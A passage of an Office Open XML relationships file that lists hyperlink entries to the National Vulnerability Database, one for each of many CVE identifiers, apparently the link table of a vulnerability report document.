Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89055" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93399" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97063" TargetMode="External" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97064" TargetMode="External" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-51457" TargetMode="External" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100520" TargetMode="External" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100544" TargetMode="External" Id="rId22" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100552" TargetMode="External" Id="rId23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100575" TargetMode="External" Id="rId24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100580" TargetMode="External" Id="rId25" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100586" TargetMode="External" Id="rId26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100587" TargetMode="External" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100596" TargetMode="External" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100599" TargetMode="External" Id="rId29" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19804" TargetMode="External" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61525" TargetMode="External" Id="rId31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62062" TargetMode="External" Id="rId32" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85542" TargetMode="External" Id="rId33" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89426" TargetMode="External" Id="rId34" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93834" TargetMode="External" Id="rId35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94445" TargetMode="External" Id="rId36" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96795" TargetMode="External" Id="rId37" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96812" TargetMode="External" Id="rId38" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97527" TargetMode="External" Id="rId39" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97528" TargetMode="External" Id="rId40" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97555" TargetMode="External" Id="rId41" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97957" TargetMode="External" Id="rId42" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98115" TargetMode="External" Id="rId43" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56725" TargetMode="External" Id="rId44" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56733" TargetMode="External" Id="rId45" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84462" TargetMode="External" Id="rId46" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100172" TargetMode="External" Id="rId47" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100176" TargetMode="External" Id="rId48" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47679" TargetMode="External" Id="rId49" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55214" TargetMode="External" Id="rId50" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71483" TargetMode="External" Id="rId51" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100248" TargetMode="External" Id="rId52" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100368" TargetMode="External" Id="rId53" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100369" TargetMode="External" Id="rId54" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56731" TargetMode="External" Id="rId55" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97898" TargetMode="External" Id="rId56" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100551" TargetMode="External" Id="rId57" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100557" TargetMode="External" Id="rId58" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100568" TargetMode="External" Id="rId59" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100588" TargetMode="External" Id="rId60" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100589" TargetMode="External" Id="rId61" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100391" TargetMode="External" Id="rId62" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100567" TargetMode="External" Id="rId63" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67236" TargetMode="External" Id="rId64" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67409" TargetMode="External" Id="rId65" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67410" TargetMode="External" Id="rId66" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97525" TargetMode="External" Id="rId67" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100387" TargetMode="External" Id="rId68" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100389" TargetMode="External" Id="rId69" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100532" TargetMode="External" Id="rId70" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44642" TargetMode="External" Id="rId71" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51773" TargetMode="External" Id="rId72" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92713" TargetMode="External" Id="rId73" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97570" TargetMode="External" Id="rId74" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97573" TargetMode="External" Id="rId75" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97875" TargetMode="External" Id="rId76" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98069" TargetMode="External" Id="rId77" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98070" TargetMode="External" Id="rId78" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98130" TargetMode="External" Id="rId79" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100559" TargetMode="External" Id="rId80" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100561" TargetMode="External" Id="rId81" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100585" TargetMode="External" Id="rId82" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100570" TargetMode="External" Id="rId83" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100597" TargetMode="External" Id="rId84" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79153" TargetMode="External" Id="rId85" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91837" TargetMode="External" Id="rId86" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91838" TargetMode="External" Id="rId87" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91839" TargetMode="External" Id="rId88" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91840" TargetMode="External" Id="rId89" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91841" TargetMode="External" Id="rId90" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97548" TargetMode="External" Id="rId91" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97575" TargetMode="External" Id="rId92" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97576" TargetMode="External" Id="rId93" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97577" TargetMode="External" Id="rId94" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97578" TargetMode="External" Id="rId95" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97579" TargetMode="External" Id="rId96" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97580" TargetMode="External" Id="rId97" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97584" TargetMode="External" Id="rId98" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97594" TargetMode="External" Id="rId99" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97602" TargetMode="External" Id="rId100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97611" TargetMode="External" Id="rId101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97612" TargetMode="External" Id="rId102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97903" TargetMode="External" Id="rId103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97910" TargetMode="External" Id="rId104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97911" TargetMode="External" Id="rId105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97937" TargetMode="External" Id="rId106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97940" TargetMode="External" Id="rId107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97941" TargetMode="External" Id="rId108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97971" TargetMode="External" Id="rId109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97991" TargetMode="External" Id="rId110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98002" TargetMode="External" Id="rId111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98017" TargetMode="External" Id="rId112" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98023" TargetMode="External" Id="rId113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98052" TargetMode="External" Id="rId114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98073" TargetMode="External" Id="rId115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98112" TargetMode="External" Id="rId116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98116" TargetMode="External" Id="rId117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98122" TargetMode="External" Id="rId118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98143" TargetMode="External" Id="rId119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98156" TargetMode="External" Id="rId120" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49470" TargetMode="External" Id="rId121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89032" TargetMode="External" Id="rId122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100578" TargetMode="External" Id="rId123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100579" TargetMode="External" Id="rId124" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67239" TargetMode="External" Id="rId125" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84893" TargetMode="External" Id="rId126" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100208" TargetMode="External" Id="rId127" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100535" TargetMode="External" Id="rId128" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100541" TargetMode="External" Id="rId129" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100543" TargetMode="External" Id="rId130" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100558" TargetMode="External" Id="rId131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100560" TargetMode="External" Id="rId132" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-10758" TargetMode="External" Id="rId133" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13456" TargetMode="External" Id="rId134" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49850" TargetMode="External" Id="rId135" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50547" TargetMode="External" Id="rId136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52622" TargetMode="External" Id="rId137" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-5267" TargetMode="External" Id="rId138" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53610" TargetMode="External" Id="rId139" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53625" TargetMode="External" Id="rId140" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57443" TargetMode="External" Id="rId141" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67237" TargetMode="External" Id="rId142" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84882" TargetMode="External" Id="rId143" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84884" TargetMode="External" Id="rId144" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85029" TargetMode="External" Id="rId145" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88003" TargetMode="External" Id="rId146" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88421" TargetMode="External" Id="rId147" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89406" TargetMode="External" Id="rId148" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91765" TargetMode="External" Id="rId149" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92550" TargetMode="External" Id="rId150" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92560" TargetMode="External" Id="rId151" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92608" TargetMode="External" Id="rId152" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97523" TargetMode="External" Id="rId153" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97524" TargetMode="External" Id="rId154" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97531" TargetMode="External" Id="rId155" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97536" TargetMode="External" Id="rId156" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97557" TargetMode="External" Id="rId157" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97562" TargetMode="External" Id="rId158" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97583" TargetMode="External" Id="rId159" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97595" TargetMode="External" Id="rId160" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97990" TargetMode="External" Id="rId161" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98050" TargetMode="External" Id="rId162" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98056" TargetMode="External" Id="rId163" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98108" TargetMode="External" Id="rId164" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100390" TargetMode="External" Id="rId165" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98096" TargetMode="External" Id="rId166" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100310" TargetMode="External" Id="rId167" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100530" TargetMode="External" Id="rId168" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93901" TargetMode="External" Id="rId169" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97865" TargetMode="External" Id="rId170" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97871" TargetMode="External" Id="rId171" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97882" TargetMode="External" Id="rId172" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97883" TargetMode="External" Id="rId173" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97885" TargetMode="External" Id="rId174" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100372" TargetMode="External" Id="rId175" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33639" TargetMode="External" Id="rId176" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42323" TargetMode="External" Id="rId177" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42324" TargetMode="External" Id="rId178" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83591" TargetMode="External" Id="rId179" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84279" TargetMode="External" Id="rId180" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84280" TargetMode="External" Id="rId181" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 